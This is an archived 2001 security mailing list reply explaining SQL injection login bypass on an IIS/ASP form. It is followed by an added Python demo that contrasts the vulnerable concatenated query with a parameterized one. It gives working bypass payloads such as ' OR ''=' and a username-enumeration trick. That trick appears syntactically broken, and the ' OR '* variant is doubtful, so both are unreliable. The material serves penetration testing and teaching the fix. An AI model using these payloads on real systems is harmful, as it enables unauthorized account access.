There's code like this in the web app:

    ' user input is concatenated straight into the query text
    SQL_Query_String = "SELECT somefield FROM Users WHERE Username = '" & strUserName & "' AND Password = '" & strPassword & "'"
    strValue = SQL_Query(SQL_Query_String)

That line of code will select the value in somefield in a row in the Users table where the specified username and password both match. If the username and password don't match any of the username and password values in any row in the table, nothing is selected and strValue is empty, which will tell the web application that authentication failed. If it's populated with something, then the user is authenticated.

What you want to do is make it so that you get somefield populated with something, anything. Try putting one of the following into the username and password fields:

    ' OR ''='

or

    ' OR '*

which will make SQL_Query_String look like this:

    SELECT somefield FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''

The statement ''='' is always true, so strValue will be populated with the first value in somefield, which is often an admin account.

Once you're authenticated and you know what the first username in the table is, you can do something like this in the password field to get the second one:

    ' OR '' = '' WHERE username > 'first_username

and so on, until you find an admin account.

I've been doing a lot of work with SQL injection techniques on IIS and I've discovered some pretty amazing stuff. I'll have a paper ready in early December describing some powerful SQL ninjitsu techniques that I've developed.

Kevin.

----- Original Message -----
From: "Gary O'leary-Steele" <GaryO@sec-1.com>
To: <PEN-TESTat_private>
Sent: Monday, November 19, 2001 8:24 AM
Subject: SQL

> Hello all,
>
> I am doing a pen test against an IIS 5 web server. The web server requires a
> user name and password via a logon form. If a single quote character is
> entered (username) the following error is produced:
>
> [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> before the character string '' and password=''.
>
> I remember reading somewhere that this can be used to gain further access,
> but I can't find the info.
>
> Can anyone help?
>
> Thanks in advance.
>
> Gary
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
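The behaviour described in the thread, as an added example that is not part of the original messages: an in-memory SQLite table stands in for the SQL Server back end (an assumption; the error text differs, but the query construction and the effect of the payload are the same), `login_vulnerable` builds the query by string concatenation exactly as the ASP line does, and `login_safe` runs the same query with bound parameters so the `' OR ''='` payload can be checked against both. The sample rows, the contents of somefield, and the function names are constructed for this example.

```python
import sqlite3

# Constructed sample data (assumption): the Users table from the thread with
# the admin row inserted first, since the post relies on the first matching
# row being returned when the WHERE clause is forced to be always true.
SAMPLE_USERS = [
    ("admin", "s3cret", "role=admin"),
    ("alice", "wonder", "role=user"),
    ("bob", "builder", "role=user"),
]


def make_db():
    """In-memory SQLite database standing in for the SQL Server back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT, somefield TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_query(username, password):
    """Mirror of the ASP concatenation in the post: the inputs are spliced
    straight into the SQL text, so a quote in either field ends the literal
    and whatever follows becomes part of the WHERE clause."""
    return ("SELECT somefield FROM Users WHERE Username = '" + username
            + "' AND Password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Returns somefield of the first matching row (authenticated), None if
    nothing matched (authentication failed), or the database error text,
    which is the symptom Gary saw when he typed a single quote."""
    try:
        row = conn.execute(build_query(username, password)).fetchone()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver sends the inputs as data,
    so a quote in the input can never change the structure of the query."""
    row = conn.execute(
        "SELECT somefield FROM Users WHERE Username = ? AND Password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR ''='"
    print(build_query(payload, payload))
    print("vulnerable, valid creds :", login_vulnerable(db, "alice", "wonder"))
    print("vulnerable, single quote:", login_vulnerable(db, "'", "x"))
    print("vulnerable, payload     :", login_vulnerable(db, payload, payload))
    print("safe, payload           :", login_safe(db, payload, payload))
```

With the payload in both fields the concatenated query becomes the one quoted in the post, and because `''=''` is true the vulnerable login returns the first row (the admin account) without knowing any credentials; the same inputs against `login_safe` simply fail to match. The plaintext Password column is kept only to match the post; it is not a recommendation.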
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 09:11:29 PST